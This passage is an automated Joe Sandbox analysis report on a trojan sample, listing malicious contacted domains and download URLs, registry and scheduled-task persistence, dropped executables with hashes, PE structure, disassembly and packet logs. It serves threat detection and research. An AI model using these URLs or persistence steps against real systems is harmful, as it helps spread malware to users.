      https://wns.windows.com/)s | 0% | Avira URL Cloud | safe |
      http://www.oberhumer.com | 0% | Virustotal | | Browse
      http://office-techs.biz/tmp/index.php | 14% | Virustotal | | Browse
      http://evilos.cc/tmp/index.php | 17% | Virustotal | | Browse

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      evilos.cc | 127.0.0.127 | true | true | | unknown
      gebeus.ru | 58.151.148.90 | true | true | | unknown
      mussangroup.com | 185.149.100.242 | true | true | | unknown

      Name | Malicious | Antivirus Detection | Reputation
      https://mussangroup.com/wp-content/images/pic1.jpg | true | 6%, Virustotal, Browse; Avira URL Cloud: malware | unknown
      https://107.173.160.139/ | true | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
      https://107.173.160.137/ | true | Avira URL Cloud: safe | unknown
      http://cx5519.com/tmp/index.php | true | 12%, Virustotal, Browse; Avira URL Cloud: malware | unknown
      https://167.235.128.153/ | true | Avira URL Cloud: safe | unknown
      http://gebeus.ru/tmp/index.php | true | 18%, Virustotal, Browse; Avira URL Cloud: malware | unknown
      http://office-techs.biz/tmp/index.php | true | 14%, Virustotal, Browse; Avira URL Cloud: malware | unknown
      http://evilos.cc/tmp/index.php | true | 17%, Virustotal, Browse; Avira URL Cloud: malware | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      https://word.office.comon | explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.2112085690.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2112085690.000000000C861000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
      https://android.notify.windows.com/iOS | explorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://powerpoint.office.comcember | explorer.exe, 00000002.00000000.2111355914.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000002.00000000.2111355914.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://api.msn.com/ | explorer.exe, 00000002.00000000.2108451661.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://excel.office.com | explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://schemas.micro | explorer.exe, 00000002.00000000.2106911547.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107728483.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107759847.0000000008890000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://crl.v | explorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://outlook.com | explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.oberhumer.com | C9F5.exe, C9F5.exe.2.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
      https://wns.windows.com/)s | explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

      IP | Domain | Country | ASN | ASN Name | Malicious
      211.202.224.10 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
      77.221.157.163 | unknown | Russian Federation | 30968 | INFOBOX-ASInfoboxruAutonomousSystemRU | true
      107.173.160.139 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
      107.173.160.137 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
      58.151.148.90 | gebeus.ru | Korea Republic of | 17858 | POWERVIS-AS-KRLGPOWERCOMMKR | true
      167.235.128.153 | unknown | United States | 3525 | ALBERTSONSUS | true
      185.149.100.242 | mussangroup.com | Turkey | 209853 | VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi | true
      64.190.113.113 | unknown | United States | 26646 | TRAVELCLICKCORP1US | true

      IP
      127.0.0.127
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1478859
      Start date and time:2024-07-23 06:14:08 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 10m 5s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:12
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:1
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:file.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@11/4@9/9
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 56
      • Number of non-executed functions: 49
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240000 for current running targets taking high CPU consumption
      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtEnumerateKey calls found.
      • Report size getting too big, too many NtOpenKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

      Time | Type | Description
      00:15:06 | API Interceptor | 544768x Sleep call for process: explorer.exe modified
      06:15:24 | Task Scheduler | Run new task: Firefox Default Browser Agent 142B09FF234E17C0 path: C:\Users\user\AppData\Roaming\ajjwvsd
      06:17:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUY C:\Users\user\AppData\Local\Temp\C9F5.exe
      06:17:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUY C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Process:C:\Windows\explorer.exe
                                              File Type:JSON data
                                              Category:modified
                                              Size (bytes):1022
                                              Entropy (8bit):5.252542495586483
                                              Encrypted:false
                                              SSDEEP:24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
                                              MD5:2F99BED9FF8C41AFEE96B028ED8B86A2
                                              SHA1:BF4E91361EE28C5506E812F2BF8C3495676097B0
                                              SHA-256:F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
                                              SHA-512:834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):988672
                                              Entropy (8bit):7.331838963074561
                                              Encrypted:false
                                              SSDEEP:24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
                                              MD5:2B3ECC21382E825D6FE0812A717717EB
                                              SHA1:F3386531F7726A4F673003BF6CB5806843B76FFB
                                              SHA-256:AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
                                              SHA-512:7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):155648
                                              Entropy (8bit):6.734975340826263
                                              Encrypted:false
                                              SSDEEP:3072:BPfLv9CAlRi9gEj5scaFYcPn5I858ioma:tLv9f+/mtCiK
                                              MD5:D76C718ADA43477786EF9CA3BBA29842
                                              SHA1:C64677DDCE626F7B343EE2AEE0DEB369DD21E0DF
                                              SHA-256:EFA03AC97D2BF5C0020AE8D90CD2977BECCCA38FE5394D77A4A5482A8190E4EE
                                              SHA-512:F1AEBE693AB40FE2B5A3238BB9976395FBC2AA2A211A52DDCA5A2D8C568062ED82CAC07AAB04523831838415547D0286EE2F42DAD733524651715F211C0F8B4C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 39%
                                              • Antivirus: Virustotal, Detection: 41%, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6..yX..yX..yX.f6..yX..+..yX..+..yX..+..yX...#..yX..yY..yX..+..yX..+..yX..+..yX.Rich.yX.........................PE..L......d.................p..........W.............@.................................I.......................................,...<.......x...............................................................................T............................text....n.......p.................. ..`.rdata........... ...t..............@..@.data...."..........................@....toxol..............................@..@.gifex..............................@....rsrc...x...........................@..@........................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.734975340826263
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.53%
                                              • InstallShield setup (43055/19) 0.43%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:155'648 bytes
                                              MD5:d76c718ada43477786ef9ca3bba29842
                                              SHA1:c64677ddce626f7b343ee2aee0deb369dd21e0df
                                              SHA256:efa03ac97d2bf5c0020ae8d90cd2977beccca38fe5394d77a4a5482a8190e4ee
                                              SHA512:f1aebe693ab40fe2b5a3238bb9976395fbc2aa2a211a52ddca5a2d8c568062ed82cac07aab04523831838415547d0286ee2f42dad733524651715f211c0f8b4c
                                              SSDEEP:3072:BPfLv9CAlRi9gEj5scaFYcPn5I858ioma:tLv9f+/mtCiK
                                              TLSH:09E3AD117E90C032CC1A43766A29CAB52629BC70DBB5858F7B95FF5FDE332A04626347
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6..yX..yX..yX.f6...yX..+...yX..+...yX..+...yX...#..yX..yY..yX..+...yX..+...yX..+...yX.Rich.yX.........................PE..L..
                                              Icon Hash:cb97394d5555599a
                                              Entrypoint:0x401557
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x64C40AC3 [Fri Jul 28 18:36:51 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:5d80776960e8ce41e325ecce5b0a696b
                                              Instruction
                                              call 00007F0658D95375h
                                              jmp 00007F0658D91A9Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 00000328h
                                              mov dword ptr [0041B818h], eax
                                              mov dword ptr [0041B814h], ecx
                                              mov dword ptr [0041B810h], edx
                                              mov dword ptr [0041B80Ch], ebx
                                              mov dword ptr [0041B808h], esi
                                              mov dword ptr [0041B804h], edi
                                              mov word ptr [0041B830h], ss
                                              mov word ptr [0041B824h], cs
                                              mov word ptr [0041B800h], ds
                                              mov word ptr [0041B7FCh], es
                                              mov word ptr [0041B7F8h], fs
                                              mov word ptr [0041B7F4h], gs
                                              pushfd
                                              pop dword ptr [0041B828h]
                                              mov eax, dword ptr [ebp+00h]
                                              mov dword ptr [0041B81Ch], eax
                                              mov eax, dword ptr [ebp+04h]
                                              mov dword ptr [0041B820h], eax
                                              lea eax, dword ptr [ebp+08h]
                                              mov dword ptr [0041B82Ch], eax
                                              mov eax, dword ptr [ebp-00000320h]
                                              mov dword ptr [0041B768h], 00010001h
                                              mov eax, dword ptr [0041B820h]
                                              mov dword ptr [0041B71Ch], eax
                                              mov dword ptr [0041B710h], C0000409h
                                              mov dword ptr [0041B714h], 00000001h
                                              mov eax, dword ptr [0041A004h]
                                              mov dword ptr [ebp-00000328h], eax
                                              mov eax, dword ptr [0041A008h]
                                              mov dword ptr [ebp-00000324h], eax
                                              call dword ptr [0000007Ch]
                                              Programming Language:
                                              • [C++] VS2008 build 21022
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1982c | 0x3c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2f000 | 0xa678 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x18000 | 0x154 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0x16ea6 | 0x17000 | e03dda7211827112453d9e60d0894099 | False | 0.7982443104619565 | data | 7.472017406032608 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x18000 | 0x1fce | 0x2000 | b6b0ba04c22c164b3dc7426687c3a265 | False | 0.3658447265625 | data | 5.549029273072478 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0x1a000 | 0x12280 | 0x1e00 | 63f8d19fabcf1e387a691eec69d51ae6 | False | 0.11901041666666666 | data | 1.3263806802099802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .toxol | 0x2d000 | 0xc | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .gifex | 0x2e000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc | 0x2f000 | 0xa678 | 0xa800 | da7ab1e273c6f2f11e63e7d2ab9ae2d9 | False | 0.5080450148809523 | data | 5.494737382446083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              DUKUPIREYAFEHO | 0x35ce8 | 0xbf7 | ASCII text, with very long lines (3063), with no line terminators | Turkish | Turkey | 0.6010447273914463
                                              RT_CURSOR | 0x36910 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 |  |  | 0.4276315789473684
                                              RT_CURSOR | 0x36a58 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 |  |  | 0.7368421052631579
                                              RT_CURSOR | 0x36b88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 |  |  | 0.06130705394190871
                                              RT_ICON | 0x2f4b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.6092750533049041
                                              RT_ICON | 0x30358 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.6904332129963899
                                              RT_ICON | 0x30c00 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.7482718894009217
                                              RT_ICON | 0x312c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7861271676300579
                                              RT_ICON | 0x31830 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5853734439834025
                                              RT_ICON | 0x33dd8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.7157598499061913
                                              RT_ICON | 0x34e80 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.7315573770491803
                                              RT_ICON | 0x35808 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.8705673758865248
                                              RT_STRING | 0x39318 | 0x15a | data |  |  | 0.5028901734104047
                                              RT_STRING | 0x39478 | 0x1d0 | data |  |  | 0.521551724137931
                                              RT_STRING | 0x39648 | 0x2a | data |  |  | 0.5952380952380952
                                              RT_ACCELERATOR | 0x368e0 | 0x30 | data |  |  | 0.9583333333333334
                                              RT_GROUP_CURSOR | 0x36a40 | 0x14 | data |  |  | 1.15
                                              RT_GROUP_CURSOR | 0x39130 | 0x22 | data |  |  | 1.088235294117647
                                              RT_GROUP_ICON | 0x35c70 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
                                              RT_VERSION | 0x39158 | 0x1bc | data |  |  | 0.5788288288288288
                                              DLL | Import
                                              KERNEL32.dll | OpenJobObjectA, InterlockedDecrement, ZombifyActCtx, FreeEnvironmentStringsA, GetModuleHandleW, LoadLibraryW, Sleep, SetVolumeMountPointA, WriteConsoleW, GetAtomNameW, SetUnhandledExceptionFilter, GetLastError, GetProcAddress, LoadLibraryA, OpenWaitableTimerW, LocalAlloc, GetCommMask, CreateWaitableTimerW, EnumDateFormatsW, FindFirstVolumeA, AreFileApisANSI, GetConsoleAliasesW, GetNumaProcessorNode, HeapFree, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, FlushFileBuffers, CreateFileA, CloseHandle
                                              ADVAPI32.dll | ReadEventLogW
                                              Language of compilation system | Country where language is spoken | Map
                                              Turkish | Turkey |
                                              Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                              2024-07-23T06:16:16.946127+0200 | TCP | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 49727 | 80 | 192.168.2.5 | 64.190.113.113
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jul 23, 2024 06:16:09.173475027 CEST4972480192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:09.173475027 CEST4972480192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:09.178530931 CEST804972458.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:09.178663969 CEST804972458.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:13.255054951 CEST804972458.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:13.255099058 CEST804972458.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:13.255491972 CEST4972480192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:13.255491972 CEST4972480192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:13.257774115 CEST4972580192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:13.260567904 CEST804972458.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:13.262733936 CEST804972558.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:13.262808084 CEST4972580192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:13.262898922 CEST4972580192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:13.262932062 CEST4972580192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:13.267915964 CEST804972558.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:13.267944098 CEST804972558.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:14.764192104 CEST804972558.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:14.764235973 CEST804972558.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:14.764302969 CEST4972580192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:14.764446974 CEST4972580192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:14.766735077 CEST4972680192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:14.771275997 CEST804972558.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:14.772074938 CEST804972658.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:14.772142887 CEST4972680192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:14.772305012 CEST4972680192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:14.772339106 CEST4972680192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:14.777138948 CEST804972658.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:14.777450085 CEST804972658.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:16.340675116 CEST804972658.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:16.340910912 CEST804972658.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:16.341264009 CEST4972680192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:16.341264963 CEST4972680192.168.2.558.151.148.90
                                              Jul 23, 2024 06:16:16.343552113 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.346793890 CEST804972658.151.148.90192.168.2.5
                                              Jul 23, 2024 06:16:16.348445892 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.348606110 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.348732948 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.354866028 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.945909023 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946037054 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946072102 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946126938 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.946326017 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946358919 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946383953 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.946392059 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946937084 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946966887 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.946996927 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.946997881 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.947031021 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.947031975 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.947081089 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:16.951071024 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.951253891 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.951287985 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:16.951313019 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.003252983 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.033579111 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.033685923 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.033719063 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.033773899 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.034069061 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.034101963 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.034118891 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.034554958 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.034607887 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.034641981 CEST804972764.190.113.113192.168.2.5
